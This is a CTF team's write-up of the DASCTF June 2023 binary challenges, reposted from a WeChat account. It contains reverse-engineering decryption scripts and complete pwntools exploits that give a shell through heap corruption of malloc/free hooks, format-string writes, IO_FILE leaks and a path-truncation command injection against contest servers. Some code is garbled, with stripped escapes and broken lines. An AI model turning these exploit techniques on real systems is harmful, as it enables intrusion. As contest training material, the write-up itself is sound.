EDI
JOIN US ▶▶▶
招新
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn 方向的师傅)有意向的师傅请联系邮箱root@edisec.net、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
01
Re
1
careful
沙箱跑一下
2
babyRe
API反调试绕过+SMC+去花指令+RC4魔改
void rc4_init(unsigned char*s,unsigned char*key,unsigned long len)
{
int i=0;
int j=0;
unsigned char k[256]={};
unsigned char temp = 0;
for(i=0;i<256;i++)
{
s[i]=i;
k[i]=key[i%0xa];
}
for(i=0;i<256;i++)
{
j=(2*j+s[i]+k[i])%256;
temp=s[i];
s[i]=s[j];
s[j]=temp;
}
}
void rc4_crypt(unsigned char*s,unsigned char*data,unsigned long len)
{
int i=0,j=0,t=0;
unsigned long k=0;
unsigned char temp;
for(k=0;k<len;k++)
{
data[k] -= k % 0xD ;
i=(i+j)%256;
j=(j+s[i])%256;
temp=s[i];
s[i]=s[j];
s[j]=temp;
t=(s[i]+j +s[j])%256;
data[k]^=s[t];
}
}
int main()
{
unsigned char s[256]={0};
char key[10] = {0x5d,0x42,0x62,0x29,0x03,0x36,0x47,0x41,0x15,0x36};
char data[45]={0xf7,0x2e,0x34,0xf0,0x72,0xcf,0x5e,0x0a,0xbb,0xec,0xb1,0x2b,0x70,0x88,0x88,0xed,0x46,0x38,0xdb,0xda,0x6c,0xbd,0xd4,0x06,0x77,0xf2,0xcf,0x56,0x88,0xc6,0x31,0xd2,0xb7,0x5a,0xc1,0x42,0xb0,0xf4,0x48,0x37,0xf5,0x2c,0xf5,0x58};
unsigned long len = strlen(data);
rc4_init(s,(unsigned char*)key,len);//初始化得到s
for (int i = 0; i < sizeof(s); i++) {
printf("%02X ", s[i]);
}
rc4_crypt(s,(unsigned char*)data,len);//解密
unsigned long len1 = strlen(data);
printf("解密后为:%s,%lu",(unsigned char*)data,len1);
return 0;
}
3
ez_exe
python3.11反编译+XXTEA
import ctypes
from time import *
from ctypes import *
from ctypes import wintypes
from hashlib import md5
class _STARTUPINFO(Structure):
_fields_ = [
('cb', c_ulong),
('lpReserved', c_char_p),
('lpDesktop', c_char_p),
('lpTitle', c_char_p),
('dwX', c_ulong),
('dwY', c_ulong),
('dwXSize', c_ulong),
('dwYSize', c_ulong),
('dwXCountChars', c_ulong),
('dwYCountChars', c_ulong),
('dwFillAttribute', c_ulong),
('dwFlags', c_ulong),
('wShowWindow', c_ushort),
('cbReserved2', c_ushort),
('lpReserved2', c_char_p),
('hStdInput', c_ulong),
('hStdOutput', c_ulong),
('hStdError', c_ulong)]
class _PROCESS_INFORMATION(Structure):
_fields_ = [
('hProcess', c_void_p),
('hThread', c_void_p),
('dwProcessId', c_ulong),
('dwThreadId', c_ulong)]
StartupInfo = _STARTUPINFO()
ProcessInfo = _PROCESS_INFORMATION()
key1 = bytes(md5(b'bin1bin1bin1').hexdigest().encode())
file = open('./task 2/bin1', 'rb').read()
arr = [key1[i % len(key1)] ^ file[i] for i in range(len(file))] //pycdc没去识别这个序列,要自己看字节码分析
open('bin3', 'wb').write(bytes(arr))
用key bin2bin2bin2去解bin2
int main()
{
unsigned int v[11] = {0xCC45699D, 0x683D5352, 0xB8BB71A0, 0xD3817AD, 0x7547E79E, 0x4BDD8C7C, 0x95E25A81, 0xC4525103, 0x7049B46F, 0x5417F77C,0x65567138};
unsigned int key[4] = {0x00004B5F, 0x0000DEAD, 0x000011ED, 0x0000B3CC};
unsigned int sum = 0;
unsigned int y,z,p,rounds,e;
int n = 11;
int i = 0;
rounds = 52/n;
y = v[0];
sum = rounds * delta ;
do
{
e = sum >> 2 & 3;
for(p=n-1;p>0;p--)
{
z = v
;
v
-= ((((z>>5)^(y<<2))+((y>>3)^(z<<4))) ^ ((key[(p&3)^e]^z)+(y ^ sum)));
y = v
;
}
z = v[n-1];
v[0] -= (((key[(p^e)&3]^z)+(y ^ sum)) ^ (((y<<2)^(z>>5))+((z<<4)^(y>>3))));
y = v[0];
sum = sum-delta ;
}while(--rounds);
for(i=0;i<n;i++)
{
printf("%c%c%c%c",*((char*)&v[i]+0),*((char*)&v[i]+1),*((char*)&v[i]+2),*((char*)&v[i]+3));
//printf("%c%c%c%c",*((char*)&v[i]+3),*((char*)&v[i]+2),*((char*)&v[i]+1),*((char*)&v[i]+0));
}
return 0;
}
02
Pwn
1
easynote
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
telescope $rebase(0x202040) 16
'''
if len(sys.argv)==1 :
clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=process(elfelf)
gdb_open=1
# io=process(['./'],env={'LD_PRELOAD':'./'})
clibc.srand(clibc.time(0))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=remote('node4.buuoj.cn',29223)
gdb_open=0
clibc.srand(clibc.time(0))
libc=ELF('./libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):
if gdb_open==1 :
gdb.attach(io,a)
def choice(a):
io.sendlineafter('5. exitn',str(a))
def add(a,b):
choice(1)
io.sendlineafter('--->n',str(a))
io.sendafter('--->n',b)
def edit(a,c,b):
choice(2)
io.sendlineafter('--->n',str(a))
io.sendlineafter('--->n',str(c))
io.sendafter('--->n',b)
def show(a):
choice(4)
io.sendlineafter('--->n',str(a))
def delete(a):
choice(3)
io.sendlineafter('--->n',str(a))
add(0xf8,'aaa')
add(0x68,'aaa')
delete(0)
show(0)
libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10
libc.address=libc_base
bin_sh_addr=libc.search('/bin/shx00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
delete(1)
edit(1,0x8,p64(libc.sym['__malloc_hook']-0x23))
add(0x68,'aaa')
add(0x68,'x00'*0x13+p64(libc_base+0xf03a4))
delete(0)
# delete(0)
success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
# gdb_attach(io,gdb_text)
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
2
fooooood
#coding:utf-8
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
b *$rebase(0xB27)
'''
if len(sys.argv)==1 :
io=process(elfelf)
gdb_open=1
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' :
io=process(elfelf)
gdb_open=0
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
io=remote('node4.buuoj.cn',29176)
gdb_open=0
libc=ELF('./libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):
if gdb_open==1 :
gdb.attach(io,a)
io.sendlineafter('name:','keer')
def go(a):
io.sendlineafter('favourite food: ',a)
go('%8$p%9$p%11$p')
io.recvuntil('You like ')
elf_base=int(io.recv(14),16)-0xb60
libc_base=int(io.recv(14),16)-libc.sym['__libc_start_main']-240
libc.address=libc_base
bin_sh_addr=libc.search('/bin/shx00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
printf_got=libc_base+0x202028
stack_addr=(int(io.recv(14),16)-0x3518+0x3424)&0xffff
pay='%'+str(stack_addr)+'c%11$hn'
go(pay)
go('%255'+'c%37$hhn')
def fmt(addr,value):
pay='%'+str(addr&0xffff)+'c%11$hn'
go(pay)
off_1=(value)&0xff
go('%'+str(off_1)+'c%37$hhn')
for i in range(5):
pay='%'+str((addr+1+i)&0xff)+'c%11$hhn'
go(pay)
off_1=(value>>((i+1)*8))&0xff
go('%'+str(off_1)+'c%37$hhn')
fmt(stack_addr+0xc+8,libc_base+one_gadgaet[3])
for i in range(248):
io.sendline('')
success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text)
io.interactive()
3
Candy_Shop
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
telescope $rebase(0x202040) 16
'''
if len(sys.argv)==1 :
clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=process(elfelf)
gdb_open=1
# io=process(['./'],env={'LD_PRELOAD':'./'})
clibc.srand(clibc.time(0))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=remote('node4.buuoj.cn',27065)
gdb_open=0
clibc.srand(clibc.time(0))
libc=ELF('./libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):
if gdb_open==1 :
gdb.attach(io,a)
def choice(a):
io.sendlineafter('option: ',a)
def add(a,b,c):
choice('b')
io.sendlineafter('Which one you want to bye: ',a)
io.sendlineafter(': ',b)
io.sendafter(': ',c)
def edit(a,b):
choice(2)
io.sendlineafter('Index:',str(a))
io.sendafter('content:',b)
def show(a):
choice('g')
io.sendlineafter(': n',a)
def delete(a):
choice(4)
io.sendlineafter('Index:',str(a))
show('%31$p')
io.recvuntil('0x')
libc_base=int(io.recv(12),16)-libc.sym['__libc_start_main']-128
libc.address=libc_base
bin_sh_addr=libc.search('/bin/shx00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
add('t','-2','a'*6+'99999n')
add('t','-10',p64(libc.sym['puts'])[0x2:]+p64(libc.sym['printf'])+p64(system_addr)[:5])
add('t','-9','x7fn')
add('t','0','/bin/shn')
success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text)
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
4
Approoooooooaching
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./bf'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
b *$rebase(0x15B9)
'''
if len(sys.argv)==1 :
clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=process(elfelf)
gdb_open=1
# io=process(['./'],env={'LD_PRELOAD':'./'})
clibc.srand(clibc.time(0))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
clibc=CDLL('/home/keer/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6')
io=remote('139.155.140.235',9999)
gdb_open=0
clibc.srand(clibc.time(0))
libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):
if gdb_open==1 :
gdb.attach(io,a)
def choice(a):
io.sendlineafter('choice: n',str(a))
def add(a,b):
choice(1)
io.sendlineafter('size: ',str(a))
choice(2)
io.sendafter('text: ',b)
def bf():
choice(3)
def run():
choice(4)
add(0xfff,'ix'*0x4+'yyy')
gdb_attach(io,gdb_text)
bf()
io.sendafter('choice: n','4n')
io.send('xE0')
# success('heap_base:'+hex(heap_base))
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
5
server
通过动调可以发现access校验的路径是有限长度,可以把后面的.key给顶掉,然后写入过长的字符串会覆盖到命令注入读取的内容,因此只要在最后执行/bin/sh #,并通过单引号闭合参数即可。
#!usr/bin/env python
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn_7')
DEBUG = 0
if DEBUG:
gdbOpen = 1
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
p = process('./pwn_7')
else:
gdbOpen = 0
ip = 'node4.buuoj.cn'
port = 25599
p = remote(ip, port)
clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
def debug(info="b main"):
if gdbOpen == 1:
gdb.attach(p, info)
#gdb.attach(p, "b *$rebase(0x)")
debug('b *$rebase(0x0000000000001495)')
p.sendlineafter(b'>> ', b'1')
p.sendlineafter(b'admin : n', b'../../../../../././bin/sh #')
p.sendlineafter(b'>> ', b'2')
p.sendlineafter(b'add : n', b"'")
p.interactive()
6
can_you_find_me
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
try :
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
telescope $rebase(0x202040) 16
'''
if len(sys.argv)==1 :
clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=process(elfelf)
gdb_open=1
# io=process(['./'],env={'LD_PRELOAD':'./'})
clibc.srand(clibc.time(0))
libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=remote('node4.buuoj.cn',27065)
gdb_open=0
clibc.srand(clibc.time(0))
libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):
if gdb_open==1 :
gdb.attach(io,a)
def choice(a):
io.sendlineafter('choice:',str(a))
def add(a,b):
choice(1)
io.sendlineafter('Size:',str(a))
io.sendafter('Data:',b)
def edit(a,b):
choice(2)
io.sendlineafter('Index:',str(a))
io.sendafter('content:',b)
def show(a):
choice(3)
io.sendlineafter('Index:',str(a))
def delete(a):
choice(2)
io.sendlineafter('Index:',str(a))
add(0x4f0,'aaan')
add(0xf0,'aaan')
add(0xf0,'aaan')
add(0x1f0,'aaan')
add(0x4f0,'aaan')
add(0xf0,'aaan')
delete(0)
delete(3)
add(0x1f8,'x00'*0x1f0+p64(0x900))
delete(4)
delete(1)
delete(0)
add(0x4f0,'n')
add(0x1e0,'x60x77n')
add(0xf0,'aaan')
add(0xf0,p64(0xfbad1887)+p64(0)*3+'xc8'+'n')
libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']
libc.address=libc_base
bin_sh_addr=libc.search('/bin/shx00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
add(0x110,'/bin/shx00'+p64(0x1f8)+p64(free_hook_addr)+'n')
add(0x1f0,'/bin/shx00n')
add(0x1f0,p64(system_addr)+'n')
delete(6)
success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text)
io.interactive()
except Exception as e:
io.close()
continue
else:
continue
7
matchmaking platform
#coding:utf-8
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
'''
if len(sys.argv)==1 :
io=process(elfelf)
gdb_open=1
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' :
io=process(elfelf)
gdb_open=0
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
io=remote('node4.buuoj.cn',25131)
gdb_open=0
libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):
if gdb_open==1 :
gdb.attach(io,a)
# io.sendafter('>> ','a'*0x80+'x60')
# io.sendafter('>> ','x18n')
# io.sendafter('>> ','a'*0x80+'x60')
# io.sendafter('>> ','x18n')
io.sendafter('>> ','a'*0x80+'x80')
io.sendafter('>> ',p64(0xfbda1887)+p64(0)*3+'x08n')
libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']
libc.address=libc_base
bin_sh_addr=libc.search('/bin/shx00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
io.sendafter('>> ','a'*0x80+'x60')
io.sendafter('>> ',p64(free_hook_addr)+'x05n')
io.sendafter('>> ','a'*0x80+'x60')
io.sendafter('>> ',p64(system_addr)+'n')
io.sendafter('>> ','a'*0x80+'xc8')
io.sendafter('>> ','/bin/shx00'+'n')
# success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text)
io.interactive()
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论